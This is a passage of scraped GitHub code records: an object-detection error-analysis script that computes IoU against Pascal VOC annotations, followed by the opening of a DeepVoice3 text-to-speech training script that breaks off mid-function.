[{"api_name": "migration.migration_utility.configuration.document_configuration.DocumentConfiguration", "line_number": 26, "usage_type": "call"}, {"api_name": "migration.config.document_cfgs", "line_number": 26, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 27, "usage_type": "call"}, {"api_name": "migration.config.source_db_cfg", "line_number": 27, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 28, "usage_type": "call"}, {"api_name": "migration.config.destination_db_cfg", "line_number": 28, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 29, "usage_type": "call"}, {"api_name": "migration.config.internal_db_cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "migration.migration_utility.controller.migration_controller.MigrationController", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "30298996547", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom PIL.ImageDraw import Draw\nfrom PIL import Image, ImageFont\nimport matplotlib.pyplot as plt\nimport os\nimport xml.etree.ElementTree as ET\nfrom os import 
listdir\nfrom os.path import isfile, join\nimport torch\nimport numpy as np\nimport pdb\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\ndef preprocess_annotation(target):\n boxes = []\n gt_classes = []\n difficult_boxes = []\n TO_REMOVE = 1\n\n for obj in target.iter(\"object\"):\n difficult = int(obj.find(\"difficult\").text) == 1\n if difficult:\n continue\n name = obj.find(\"name\").text.lower().strip()\n bb = obj.find(\"bndbox\")\n # Make pixel indexes 0-based\n # Refer to \"https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211\"\n box = [\n bb.find(\"xmin\").text,\n bb.find(\"ymin\").text,\n bb.find(\"xmax\").text,\n bb.find(\"ymax\").text,\n ]\n bndbox = tuple(\n map(lambda x: x - TO_REMOVE, list(map(int, box)))\n )\n\n boxes.append(bndbox)\n gt_classes.append(name)\n difficult_boxes.append(difficult)\n\n size = target.find(\"size\")\n im_info = tuple(map(int, (size.find(\"height\").text, size.find(\"width\").text)))\n\n res = {\n \"boxes\": torch.tensor(boxes, dtype=torch.float32),\n \"labels\": gt_classes,\n \"difficult\": torch.tensor(difficult_boxes),\n \"im_info\": im_info,\n }\n return res\n\ndef boxlist_iou(boxList1, boxList2):\n #INTERSEZIONE\n\n if boxList1.size != boxList2.size:\n raise RuntimeError(\"boxlists should have the same image size, got {}, {}\".format(boxList1, boxList2))\n\n boxList1 = boxList1.convert(\"xyxy\")\n boxList2 = boxList2.convert(\"xyxy\")\n\n area1 = boxList1.area()\n area2 = boxList2.area()\n\n box1, box2 = boxList1.bbox, boxList2.bbox\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N,M,2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N,M,2]\n\n TO_REMOVE = 1\n\n wh = (rb - lt + TO_REMOVE).clamp(min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n ###############\n #AREA \n #area1 = (boxList1[:, 2] - boxList1[:, 0] + TO_REMOVE) * (boxList1[:, 3] - boxList1[:, 1] + TO_REMOVE)\n #area2 = (boxList2[:, 2] - boxList2[:, 0] + TO_REMOVE) * (boxList2[:, 3] - boxList2[:, 1] + TO_REMOVE)\n #IoU\n iou = inter / (area1[:, None] + area2 - inter)\n \n return iou\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', type=str, help='Dataset root dir')\nparser.add_argument('--detections', type=str, help=\"Saved Detections .pth file\")\nparser.add_argument('--anno_path', type=str, help='Path to annotations .xml')\nparser.add_argument('--n_most_conf', type=int, default=2000, help='Number of most confidence predictions to condider for the Error Analysis')\nparser.add_argument('--subset_classes', nargs='+', help=\"List of classes to consider\")\nargs = parser.parse_args()\n\nvoc_classes = [\"__background__\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\ncityscapes_classes = [\"__background__ \",\"person\",\"rider\",\"car\",\"truck\",\"bus\",\"train\",\"motorcycle\",\"bicycle\"]\n\n\nclasses = voc_classes\n\nif args.subset_classes is not None:\n sub_set_classes = args.subset_classes\nelse:\n sub_set_classes = classes\n\ndetections = torch.load(open(args.detections, 'rb'))\n\nlines = open(os.path.join(args.target, 'ImageSets', 'Main', 'test.txt'), 'r').readlines()\nlines = [l.strip() for l in lines]\n\nassert len(lines) == len(detections)\n\nall_info = [] \n\nfor i in range(len(lines)): \n\n if (detections[i].bbox.shape[0] == 0):\n #questo caso significa che per 
quella immagine non ci sono predizioni della rete, cioè FN)\n continue\n\n\n annotations = ET.parse(args.anno_path + lines[i] +'.xml').getroot()\n immage_info = preprocess_annotation(annotations)\n\n if (immage_info[\"boxes\"].shape[0] == 0):\n #caso penso impossibile, cioè ground-truth image without bbox\n continue\n\n\n im_height, im_width = immage_info[\"im_info\"]\n detections[i] = detections[i].resize((im_width, im_height))\n\n detections[i].bbox[:, 2:] += 1\n immage_info[\"boxes\"][:, 2:] += 1\n\n iou_res = boxlist_iou(BoxList(detections[i].bbox.numpy(),(im_width, im_height)), BoxList(immage_info[\"boxes\"].numpy(), (im_width, im_height))).numpy()\n\n gt_index = iou_res.argmax(axis=1)\n iou_with_gt = iou_res.max(axis=1)\n\n del iou_res\n\n\n for k in range(len(detections[i].extra_fields['labels'])):\n\n temp_dict = {}\n temp_dict[f\"{i}_{k}\"] = k\n temp_dict[\"label_p\"] = classes[detections[i].extra_fields['labels'][k]]\n\n temp_dict[\"label_gt\"] = immage_info[\"labels\"][gt_index[k]]\n temp_dict[\"score\"] = detections[i].extra_fields['scores'].numpy()[k]\n temp_dict[\"iou_gt\"] = iou_with_gt[k]\n\n if temp_dict[\"label_gt\"] in sub_set_classes:\n all_info.append(temp_dict)\n\n\n\ndef take_score(elem):\n return elem[\"score\"]\n\nall_info_sort = sorted(all_info, key=take_score, reverse=True)\n\n#ERROR ANALYSIS\n\n#prendo i primi 1000 most confidence predictions\nn_most_conf = args.n_most_conf \nall_info_sort = all_info_sort[:n_most_conf]\n#print(all_info_sort)\n\ncorrect = 0\nmisloc = 0\nbackgr = 0\ncounter = 0\n\nfor el in all_info_sort:\n\n if el[\"label_p\"] == el[\"label_gt\"]:\n\n if el[\"iou_gt\"] < 0.3:\n backgr += 1\n elif el[\"iou_gt\"] >= 0.5:\n correct += 1\n else:\n misloc += 1\n else:\n backgr += 1\n\n counter += 1\n\nprint(f\"Correct detections: {(correct/counter)*100:.2f}%\")\nprint(f\"Mislocalization Error: {(misloc/counter)*100:.2f}%\")\nprint(f\"Background Error: {(backgr/counter)*100:.2f}%\")\nprint(counter)\n\n", "repo_name": "FrancescoCappio/DL_utils", "sub_path": "Object_detection_error_analysis/error_analysis_with_BoxList.py", "file_name": "error_analysis_with_BoxList.py", "file_ext": "py", "file_size_in_byte": 5879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 73, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 126, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 126, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.structures.bounding_box.BoxList", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "40344938698", "text": "\"\"\"Trainining script for seq2seq text-to-speech synthesis model.\n\nusage: train.py [options]\n\noptions:\n --data-root= Directory contains preprocessed features.\n --checkpoint-dir= Directory where to save model checkpoints [default: checkpoints].\n --hparams= Hyper parameters 
[default: ].\n --preset= Path of preset parameters (json).\n --checkpoint= Restore model from checkpoint path if given.\n --checkpoint-seq2seq= Restore seq2seq model from checkpoint path.\n --checkpoint-postnet= Restore postnet model from checkpoint path.\n --train-seq2seq-only Train only seq2seq model.\n --train-postnet-only Train only postnet model.\n --restore-parts= Restore part of the model.\n --log-event-path= Log event path.\n --reset-optimizer Reset optimizer.\n --load-embedding= Load embedding from checkpoint.\n --speaker-id= Use specific speaker of data in case for multi-speaker datasets.\n -h, --help Show this help message and exit\n\"\"\"\nfrom docopt import docopt\n\nimport sys\nimport gc\nimport platform\nfrom os.path import dirname, join\nfrom tqdm import tqdm, trange\nfrom datetime import datetime\n\n# The deepvoice3 model\nfrom deepvoice3_pytorch import frontend, builder\nimport audio\nimport lrschedule\n\nimport torch\nfrom torch import nn\nfrom torch import optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data as data_utils\nfrom torch.utils.data.sampler import Sampler\nimport numpy as np\nfrom numba import jit\n\nfrom nnmnkwii.datasets import FileSourceDataset, FileDataSource\nfrom os.path import join, expanduser\nimport random\n\nimport librosa.display\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nfrom tensorboardX import SummaryWriter\nfrom matplotlib import cm\nfrom warnings import warn\nfrom hparams import hparams, hparams_debug_string\n\nglobal_step = 0\nglobal_epoch = 0\nuse_cuda = torch.cuda.is_available()\nif use_cuda:\n cudnn.benchmark = False\n\n_frontend = None # to be set later\n\n\ndef _pad(seq, max_len, constant_values=0):\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=constant_values)\n\n\ndef _pad_2d(x, max_len, b_pad=0):\n x = np.pad(x, [(b_pad, max_len - len(x) - b_pad), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\nclass TextDataSource(FileDataSource):\n def __init__(self, data_root, speaker_id=None):\n self.data_root = data_root\n self.speaker_ids = None\n self.multi_speaker = False\n # If not None, filter by speaker_id\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n self.multi_speaker = len(l) == 5\n texts = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[3], lines))\n if self.multi_speaker:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n if self.speaker_id is not None:\n indices = np.array(speaker_ids) == self.speaker_id\n texts = list(np.array(texts)[indices])\n self.multi_speaker = False\n return texts\n\n return texts, speaker_ids\n else:\n return texts\n\n def collect_features(self, *args):\n if self.multi_speaker:\n text, speaker_id = args\n else:\n text = args[0]\n global _frontend\n if _frontend is None:\n _frontend = getattr(frontend, 
hparams.frontend)\n seq = _frontend.text_to_sequence(text, p=hparams.replace_pronunciation_prob)\n\n if platform.system() == \"Windows\":\n if hasattr(hparams, 'gc_probability'):\n _frontend = None # memory leaking prevention in Windows\n if np.random.rand() < hparams.gc_probability:\n gc.collect() # garbage collection enforced\n print(\"GC done\")\n\n if self.multi_speaker:\n return np.asarray(seq, dtype=np.int32), int(speaker_id)\n else:\n return np.asarray(seq, dtype=np.int32)\n\n\nclass _NPYDataSource(FileDataSource):\n def __init__(self, data_root, col, speaker_id=None):\n self.data_root = data_root\n self.col = col\n self.frame_lengths = []\n self.speaker_id = speaker_id\n\n def collect_files(self):\n meta = join(self.data_root, \"train.txt\")\n with open(meta, \"rb\") as f:\n lines = f.readlines()\n l = lines[0].decode(\"utf-8\").split(\"|\")\n assert len(l) == 4 or len(l) == 5\n multi_speaker = len(l) == 5\n self.frame_lengths = list(\n map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[2]), lines))\n\n paths = list(map(lambda l: l.decode(\"utf-8\").split(\"|\")[self.col], lines))\n paths = list(map(lambda f: join(self.data_root, f), paths))\n\n if multi_speaker and self.speaker_id is not None:\n speaker_ids = list(map(lambda l: int(l.decode(\"utf-8\").split(\"|\")[-1]), lines))\n # Filter by speaker_id\n # using multi-speaker dataset as a single speaker dataset\n indices = np.array(speaker_ids) == self.speaker_id\n paths = list(np.array(paths)[indices])\n self.frame_lengths = list(np.array(self.frame_lengths)[indices])\n # aha, need to cast numpy.int64 to int\n self.frame_lengths = list(map(int, self.frame_lengths))\n\n return paths\n\n def collect_features(self, path):\n return np.load(path)\n\n\nclass MelSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(MelSpecDataSource, self).__init__(data_root, 1, speaker_id)\n\n\nclass LinearSpecDataSource(_NPYDataSource):\n def __init__(self, data_root, speaker_id=None):\n super(LinearSpecDataSource, self).__init__(data_root, 0, speaker_id)\n\n\nclass PartialyRandomizedSimilarTimeLengthSampler(Sampler):\n \"\"\"Partially randmoized sampler\n\n 1. Sort by lengths\n 2. Pick a small patch and randomize it\n 3. 
Permutate mini-batchs\n \"\"\"\n\n def __init__(self, lengths, batch_size=16, batch_group_size=None,\n permutate=True):\n self.lengths, self.sorted_indices = torch.sort(torch.LongTensor(lengths))\n self.batch_size = batch_size\n if batch_group_size is None:\n batch_group_size = min(batch_size * 32, len(self.lengths))\n if batch_group_size % batch_size != 0:\n batch_group_size -= batch_group_size % batch_size\n\n self.batch_group_size = batch_group_size\n assert batch_group_size % batch_size == 0\n self.permutate = permutate\n\n def __iter__(self):\n indices = self.sorted_indices.clone()\n batch_group_size = self.batch_group_size\n s, e = 0, 0\n for i in range(len(indices) // batch_group_size):\n s = i * batch_group_size\n e = s + batch_group_size\n random.shuffle(indices[s:e])\n\n # Permutate batches\n if self.permutate:\n perm = np.arange(len(indices[:e]) // self.batch_size)\n random.shuffle(perm)\n indices[:e] = indices[:e].view(-1, self.batch_size)[perm, :].view(-1)\n\n # Handle last elements\n s += batch_group_size\n if s < len(indices):\n random.shuffle(indices[s:])\n\n return iter(indices)\n\n def __len__(self):\n return len(self.sorted_indices)\n\n\nclass PyTorchDataset(object):\n def __init__(self, X, Mel, Y):\n self.X = X\n self.Mel = Mel\n self.Y = Y\n # alias\n self.multi_speaker = X.file_data_source.multi_speaker\n\n def __getitem__(self, idx):\n if self.multi_speaker:\n text, speaker_id = self.X[idx]\n return text, self.Mel[idx], self.Y[idx], speaker_id\n else:\n return self.X[idx], self.Mel[idx], self.Y[idx]\n\n def __len__(self):\n return len(self.X)\n\n\ndef sequence_mask(sequence_length, max_len=None):\n if max_len is None:\n max_len = sequence_length.data.max()\n batch_size = sequence_length.size(0)\n seq_range = torch.arange(0, max_len).long()\n seq_range_expand = seq_range.unsqueeze(0).expand(batch_size, max_len)\n if sequence_length.is_cuda:\n seq_range_expand = seq_range_expand.cuda()\n seq_length_expand = sequence_length.unsqueeze(1) \\\n .expand_as(seq_range_expand)\n return (seq_range_expand < seq_length_expand).float()\n\n\nclass MaskedL1Loss(nn.Module):\n def __init__(self):\n super(MaskedL1Loss, self).__init__()\n self.criterion = nn.L1Loss(reduction=\"sum\")\n\n def forward(self, input, target, lengths=None, mask=None, max_len=None):\n if lengths is None and mask is None:\n raise RuntimeError(\"Should provide either lengths or mask\")\n\n # (B, T, 1)\n if mask is None:\n mask = sequence_mask(lengths, max_len).unsqueeze(-1)\n\n # (B, T, D)\n mask_ = mask.expand_as(input)\n loss = self.criterion(input * mask_, target * mask_)\n return loss / mask_.sum()\n\n\ndef collate_fn(batch):\n \"\"\"Create batch\"\"\"\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n multi_speaker = len(batch[0]) == 4\n\n # Lengths\n input_lengths = [len(x[0]) for x in batch]\n max_input_len = max(input_lengths)\n\n target_lengths = [len(x[1]) for x in batch]\n\n max_target_len = max(target_lengths)\n if max_target_len % r != 0:\n max_target_len += r - max_target_len % r\n assert max_target_len % r == 0\n if max_target_len % downsample_step != 0:\n max_target_len += downsample_step - max_target_len % downsample_step\n assert max_target_len % downsample_step == 0\n\n # Set 0 for zero beginning padding\n # imitates initial decoder states\n b_pad = r\n max_target_len += b_pad * downsample_step\n\n a = np.array([_pad(x[0], max_input_len) for x in batch], dtype=np.int)\n x_batch = torch.LongTensor(a)\n\n input_lengths = torch.LongTensor(input_lengths)\n target_lengths 
= torch.LongTensor(target_lengths)\n\n b = np.array([_pad_2d(x[1], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n mel_batch = torch.FloatTensor(b)\n\n c = np.array([_pad_2d(x[2], max_target_len, b_pad=b_pad) for x in batch],\n dtype=np.float32)\n y_batch = torch.FloatTensor(c)\n\n # text positions\n text_positions = np.array([_pad(np.arange(1, len(x[0]) + 1), max_input_len)\n for x in batch], dtype=np.int)\n text_positions = torch.LongTensor(text_positions)\n\n max_decoder_target_len = max_target_len // r // downsample_step\n\n # frame positions\n s, e = 1, max_decoder_target_len + 1\n # if b_pad > 0:\n # s, e = s - 1, e - 1\n # NOTE: needs clone to supress RuntimeError in dataloarder...\n # ref: https://github.com/pytorch/pytorch/issues/10756\n frame_positions = torch.arange(s, e).long().unsqueeze(0).expand(\n len(batch), max_decoder_target_len).clone()\n\n # done flags\n done = np.array([_pad(np.zeros(len(x[1]) // r // downsample_step - 1),\n max_decoder_target_len, constant_values=1)\n for x in batch])\n done = torch.FloatTensor(done).unsqueeze(-1)\n\n if multi_speaker:\n speaker_ids = torch.LongTensor([x[3] for x in batch])\n else:\n speaker_ids = None\n\n return x_batch, input_lengths, mel_batch, y_batch, \\\n (text_positions, frame_positions), done, target_lengths, speaker_ids\n\n\ndef time_string():\n return datetime.now().strftime('%Y-%m-%d %H:%M')\n\n\ndef save_alignment(path, attn):\n plot_alignment(attn.T, path, info=\"{}, {}, step={}\".format(\n hparams.builder, time_string(), global_step))\n\n\ndef prepare_spec_image(spectrogram):\n # [0, 1]\n spectrogram = (spectrogram - np.min(spectrogram)) / (np.max(spectrogram) - np.min(spectrogram))\n spectrogram = np.flip(spectrogram, axis=1) # flip against freq axis\n return np.uint8(cm.magma(spectrogram.T) * 255)\n\n\ndef eval_model(global_step, writer, device, model, checkpoint_dir, ismultispeaker):\n # harded coded\n texts = [\n \"Scientists at the CERN laboratory say they have discovered a new particle.\",\n \"There's a way to measure the acute emotional intelligence that has never gone out of style.\",\n \"President Trump met with other leaders at the Group of 20 conference.\",\n \"Generative adversarial network or variational auto-encoder.\",\n \"Please call Stella.\",\n \"Some have accepted this as a miracle without any physical explanation.\",\n ]\n import synthesis\n synthesis._frontend = _frontend\n\n eval_output_dir = join(checkpoint_dir, \"eval\")\n os.makedirs(eval_output_dir, exist_ok=True)\n\n # Prepare model for evaluation\n model_eval = build_model().to(device)\n model_eval.load_state_dict(model.state_dict())\n\n # hard coded\n speaker_ids = [0, 1, hparams.n_speakers-1] if ismultispeaker else [None]\n for speaker_id in speaker_ids:\n speaker_str = \"multispeaker{}\".format(speaker_id) if speaker_id is not None else \"single\"\n\n for idx, text in enumerate(texts):\n signal, alignment, _, mel = synthesis.tts(\n model_eval, text, p=0, speaker_id=speaker_id, fast=True)\n signal /= np.max(np.abs(signal))\n\n # Alignment\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_alignment.png\".format(\n global_step, idx, speaker_str))\n save_alignment(path, alignment)\n tag = \"eval_averaged_alignment_{}_{}\".format(idx, speaker_str)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Mel\n try:\n writer.add_image(\"(Eval) Predicted mel spectrogram text{}_{}\".format(idx, speaker_str),\n prepare_spec_image(mel), 
global_step)\n except Exception as e:\n warn(str(e))\n\n # Audio\n path = join(eval_output_dir, \"step{:09d}_text{}_{}_predicted.wav\".format(\n global_step, idx, speaker_str))\n audio.save_wav(signal, path)\n\n try:\n writer.add_audio(\"(Eval) Predicted audio signal {}_{}\".format(idx, speaker_str),\n signal, global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef save_states(global_step, writer, mel_outputs, linear_outputs, attn, mel, y,\n input_lengths, checkpoint_dir=None):\n print(\"Save intermediate states at step {}\".format(global_step))\n\n # idx = np.random.randint(0, len(input_lengths))\n idx = min(1, len(input_lengths) - 1)\n input_length = input_lengths[idx]\n\n # Alignment\n # Multi-hop attention\n if attn is not None and attn.dim() == 4:\n for i, alignment in enumerate(attn):\n alignment = alignment[idx].cpu().data.numpy()\n tag = \"alignment_layer{}\".format(i + 1)\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n # save files as well for now\n alignment_dir = join(\n checkpoint_dir, \"alignment_layer{}\".format(i + 1))\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_{}_alignment.png\".format(\n global_step, i + 1))\n save_alignment(path, alignment)\n except Exception as e:\n warn(str(e))\n\n # Save averaged alignment\n alignment_dir = join(checkpoint_dir, \"alignment_ave\")\n os.makedirs(alignment_dir, exist_ok=True)\n path = join(alignment_dir, \"step{:09d}_layer_alignment.png\".format(global_step))\n alignment = attn.mean(0)[idx].cpu().data.numpy()\n save_alignment(path, alignment)\n tag = \"averaged_alignment\"\n\n try:\n writer.add_image(tag, np.uint8(cm.viridis(\n np.flip(alignment, 1).T) * 255), global_step)\n except Exception as e:\n warn(str(e))\n\n # Predicted mel spectrogram\n if mel_outputs is not None:\n mel_output = mel_outputs[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Predicted mel spectrogram\",\n mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted spectrogram\n if linear_outputs is not None:\n linear_output = linear_outputs[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Predicted linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Predicted audio signal\n signal = audio.inv_spectrogram(linear_output.T)\n signal /= np.max(np.abs(signal))\n path = join(checkpoint_dir, \"step{:09d}_predicted.wav\".format(\n global_step))\n try:\n writer.add_audio(\"Predicted audio signal\", signal,\n global_step, sample_rate=hparams.sample_rate)\n except Exception as e:\n warn(str(e))\n pass\n audio.save_wav(signal, path)\n\n # Target mel spectrogram\n if mel_outputs is not None:\n mel_output = mel[idx].cpu().data.numpy()\n mel_output = prepare_spec_image(audio._denormalize(mel_output))\n try:\n writer.add_image(\"Target mel spectrogram\", mel_output, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n # Target spectrogram\n if linear_outputs is not None:\n linear_output = y[idx].cpu().data.numpy()\n spectrogram = prepare_spec_image(audio._denormalize(linear_output))\n try:\n writer.add_image(\"Target linear spectrogram\",\n spectrogram, global_step)\n except Exception as e:\n warn(str(e))\n pass\n\n\ndef logit(x, eps=1e-8):\n return torch.log(x + eps) - torch.log(1 - x + eps)\n\n\ndef 
masked_mean(y, mask):\n # (B, T, D)\n mask_ = mask.expand_as(y)\n return (y * mask_).sum() / mask_.sum()\n\n\ndef spec_loss(y_hat, y, mask, priority_bin=None, priority_w=0):\n masked_l1 = MaskedL1Loss()\n l1 = nn.L1Loss()\n\n w = hparams.masked_loss_weight\n\n # L1 loss\n if w > 0:\n assert mask is not None\n l1_loss = w * masked_l1(y_hat, y, mask=mask) + (1 - w) * l1(y_hat, y)\n else:\n assert mask is None\n l1_loss = l1(y_hat, y)\n\n # Priority L1 loss\n if priority_bin is not None and priority_w > 0:\n if w > 0:\n priority_loss = w * masked_l1(\n y_hat[:, :, :priority_bin], y[:, :, :priority_bin], mask=mask) \\\n + (1 - w) * l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n else:\n priority_loss = l1(y_hat[:, :, :priority_bin], y[:, :, :priority_bin])\n l1_loss = (1 - priority_w) * l1_loss + priority_w * priority_loss\n\n # Binary divergence loss\n if hparams.binary_divergence_weight <= 0:\n binary_div = y.data.new(1).zero_()\n else:\n y_hat_logits = logit(y_hat)\n z = -y * y_hat_logits + torch.log1p(torch.exp(y_hat_logits))\n if w > 0:\n binary_div = w * masked_mean(z, mask) + (1 - w) * z.mean()\n else:\n binary_div = z.mean()\n\n return l1_loss, binary_div\n\n\n@jit(nopython=True)\ndef guided_attention(N, max_N, T, max_T, g):\n W = np.zeros((max_N, max_T), dtype=np.float32)\n for n in range(N):\n for t in range(T):\n W[n, t] = 1 - np.exp(-(n / N - t / T)**2 / (2 * g * g))\n return W\n\n\ndef guided_attentions(input_lengths, target_lengths, max_target_len, g=0.2):\n B = len(input_lengths)\n max_input_len = input_lengths.max()\n W = np.zeros((B, max_target_len, max_input_len), dtype=np.float32)\n for b in range(B):\n W[b] = guided_attention(input_lengths[b], max_input_len,\n target_lengths[b], max_target_len, g).T\n return W\n\n\ndef train(device, model, data_loader, optimizer, writer,\n init_lr=0.002,\n checkpoint_dir=None, checkpoint_interval=None, nepochs=None,\n clip_thresh=1.0,\n train_seq2seq=True, train_postnet=True):\n linear_dim = model.linear_dim\n r = hparams.outputs_per_step\n downsample_step = hparams.downsample_step\n current_lr = init_lr\n\n binary_criterion = nn.BCELoss()\n\n assert train_seq2seq or train_postnet\n\n global global_step, global_epoch\n while global_epoch < nepochs:\n running_loss = 0.\n for step, (x, input_lengths, mel, y, positions, done, target_lengths,\n speaker_ids) \\\n in tqdm(enumerate(data_loader)):\n model.train()\n ismultispeaker = speaker_ids is not None\n # Learning rate schedule\n if hparams.lr_schedule is not None:\n lr_schedule_f = getattr(lrschedule, hparams.lr_schedule)\n current_lr = lr_schedule_f(\n init_lr, global_step, **hparams.lr_schedule_kwargs)\n for param_group in optimizer.param_groups:\n param_group['lr'] = current_lr\n optimizer.zero_grad()\n\n # Used for Position encoding\n text_positions, frame_positions = positions\n\n # Downsample mel spectrogram\n if downsample_step > 1:\n mel = mel[:, 0::downsample_step, :].contiguous()\n\n # Lengths\n input_lengths = input_lengths.long().numpy()\n decoder_lengths = target_lengths.long().numpy() // r // downsample_step\n\n max_seq_len = max(input_lengths.max(), decoder_lengths.max())\n if max_seq_len >= hparams.max_positions:\n raise RuntimeError(\n \"\"\"max_seq_len ({}) >= max_posision ({})\nInput text or decoder targget length exceeded the maximum length.\nPlease set a larger value for ``max_position`` in hyper parameters.\"\"\".format(\n max_seq_len, hparams.max_positions))\n\n # Transform data to CUDA device\n if train_seq2seq:\n x = x.to(device)\n text_positions = 
text_positions.to(device)\n frame_positions = frame_positions.to(device)\n if train_postnet:\n y = y.to(device)\n mel, done = mel.to(device), done.to(device)\n target_lengths = target_lengths.to(device)\n speaker_ids = speaker_ids.to(device) if ismultispeaker else None\n\n # Create mask if we use masked loss\n if hparams.masked_loss_weight > 0:\n # decoder output domain mask\n decoder_target_mask = sequence_mask(\n target_lengths // (r * downsample_step),\n max_len=mel.size(1)).unsqueeze(-1)\n if downsample_step > 1:\n # spectrogram-domain mask\n target_mask = sequence_mask(\n target_lengths, max_len=y.size(1)).unsqueeze(-1)\n else:\n target_mask = decoder_target_mask\n # shift mask\n decoder_target_mask = decoder_target_mask[:, r:, :]\n target_mask = target_mask[:, r:, :]\n else:\n decoder_target_mask, target_mask = None, None\n\n # Apply model\n if train_seq2seq and train_postnet:\n mel_outputs, linear_outputs, attn, done_hat = model(\n x, mel, speaker_ids=speaker_ids,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n elif train_seq2seq:\n assert speaker_ids is None\n mel_outputs, attn, done_hat, _ = model.seq2seq(\n x, mel,\n text_positions=text_positions, frame_positions=frame_positions,\n input_lengths=input_lengths)\n # reshape\n mel_outputs = mel_outputs.view(len(mel), -1, mel.size(-1))\n linear_outputs = None\n elif train_postnet:\n assert speaker_ids is None\n linear_outputs = model.postnet(mel)\n mel_outputs, attn, done_hat = None, None, None\n\n # Losses\n w = hparams.binary_divergence_weight\n\n # mel:\n if train_seq2seq:\n mel_l1_loss, mel_binary_div = spec_loss(\n mel_outputs[:, :-r, :], mel[:, r:, :], decoder_target_mask)\n mel_loss = (1 - w) * mel_l1_loss + w * mel_binary_div\n\n # done:\n if train_seq2seq:\n done_loss = binary_criterion(done_hat, done)\n\n # linear:\n if train_postnet:\n n_priority_freq = int(hparams.priority_freq / (hparams.sample_rate * 0.5) * linear_dim)\n linear_l1_loss, linear_binary_div = spec_loss(\n linear_outputs[:, :-r, :], y[:, r:, :], target_mask,\n priority_bin=n_priority_freq,\n priority_w=hparams.priority_freq_weight)\n linear_loss = (1 - w) * linear_l1_loss + w * linear_binary_div\n\n # Combine losses\n if train_seq2seq and train_postnet:\n loss = mel_loss + linear_loss + done_loss\n elif train_seq2seq:\n loss = mel_loss + done_loss\n elif train_postnet:\n loss = linear_loss\n\n # attention\n if train_seq2seq and hparams.use_guided_attention:\n soft_mask = guided_attentions(input_lengths, decoder_lengths,\n attn.size(-2),\n 